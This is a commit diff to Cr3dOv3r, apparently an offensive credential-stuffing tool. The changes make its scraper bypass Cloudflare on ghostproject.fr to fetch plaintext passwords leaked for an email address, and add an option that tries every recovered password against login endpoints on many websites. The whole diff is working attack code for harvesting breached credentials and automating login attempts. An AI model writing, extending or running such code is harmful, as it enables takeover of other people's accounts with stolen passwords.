query fix, add choice to check all password

Core/ispwned.py

@@ -1,6 +1,6 @@
 #Written by: Karim shoair - D4Vinci ( Cr3dOv3r )
 # -*- encoding: utf-8 -*-
-import requests,sys
+import requests,sys, cfscrape
 from .color import *
 from imp import reload
 if sys.version[0] == '2':
@@ -20,10 +20,14 @@ def check_haveibeenpwned(email):
 def grab_password(email):
     # No docs(Because no API), just found it by analyzing the network and told the admin :D
     url  = "https://ghostproject.fr/search.php"
-    data = {"param":email}
-    req = requests.post(url,headers=UserAgent,data=data)
-    result = req.text.split("\\n")
-    if "Error" in req.text or len(result)==2:
+    scraper = cfscrape.CloudflareScraper()
+
+    cookie = { "cookieconsent_status": "dismiss" }
+    data = {"param": email}
+
+    req = scraper.post(url, cookies=cookie, data=data).text
+    result = req.split("\\n")
+    if "Error" in req or len(result)==2:
         return False
     else:
         return result[1:-1]
@@ -42,7 +46,10 @@ def parse_data(email,np):
             p = grab_password(email)
             if p:
                 status("Plaintext password(s) found!")
-                for pp in p:
-                    print(C+" │"+B+"  └──── "+W+pp.split(":")[1])
+                passwdList = [x.split(':')[1] for x in p]
+                for pp in passwdList:
+                    print(C+" │"+B+"  └──── "+W+pp)
+                return passwdList
             else:
                 error("Didn't find any plaintext password published!")
+

Cr3d0v3r.py

@@ -120,32 +120,53 @@ def req_login( name ,dic ,email ,pwd ):
 	status("[{:10s}] Login successful!".format(name))
 
 def main():
+	passwd = []
 	if not args.q:
 		banner()
 	if not args.p:
 		status("Checking email in public leaks...")
-		ispwned.parse_data(email,args.np)
+		passwdList = ispwned.parse_data(email,args.np)
 
 	print(C+" │"+end)
-	line =C+" └──=>Enter a password"+W+"─=> "
-	if os.name=="nt":
-		pwd   = getinput(line) #Escaping the echo warning, sorry guyss (¯\_(ツ)_/¯)
+	line =C+" └──=>Check all password(s) ? (y/n)"+W+"─=> "
+	answer = input(line)
+
+	if answer in "yY" and len(answer) == 1:
+		websitesCheck(passwdList, True)
 	else:
-		pwd   = getpass(line)
+		print(C+" │"+end)
+		line =C+" └──=>Enter a password"+W+"─=> "
+
+		if os.name=="nt":
+			pwd   = getinput(line) #Escaping the echo warning, sorry guyss (¯\_(ツ)_/¯)
+		else:
+			pwd   = getpass(line)
+
+		passwd.append(pwd)
+		websitesCheck(passwd, False)	
 
+
+def websitesCheck(passwdList, flag):
 	print("")
 	status("Testing email against {} website".format( Y+str(len(all_websites))+G ))
-	for wd in list(websites.keys()):
-		dic = websites[wd]
-		login( wd ,dic ,email ,pwd )
-
-	for wd in list(custom_websites.keys()):
-		dic = custom_websites[wd]
-		custom_login( wd ,dic ,email ,pwd )
+
+	for pwd in passwdList:
+		print("")
+		if flag:
+			status(f"Testing password : {pwd}")
+
+		for wd in list(websites.keys()):
+			dic = websites[wd]
+			login( wd ,dic ,email ,pwd )
+
+		for wd in list(custom_websites.keys()):
+			dic = custom_websites[wd]
+			custom_login( wd ,dic ,email ,pwd )
+
+		for wd in list(req_websites.keys()):
+			dic = req_websites[wd]
+			req_login( wd ,dic ,email ,pwd )
 
-	for wd in list(req_websites.keys()):
-		dic = req_websites[wd]
-		req_login( wd ,dic ,email ,pwd )
 
 if __name__ == '__main__':
 	main()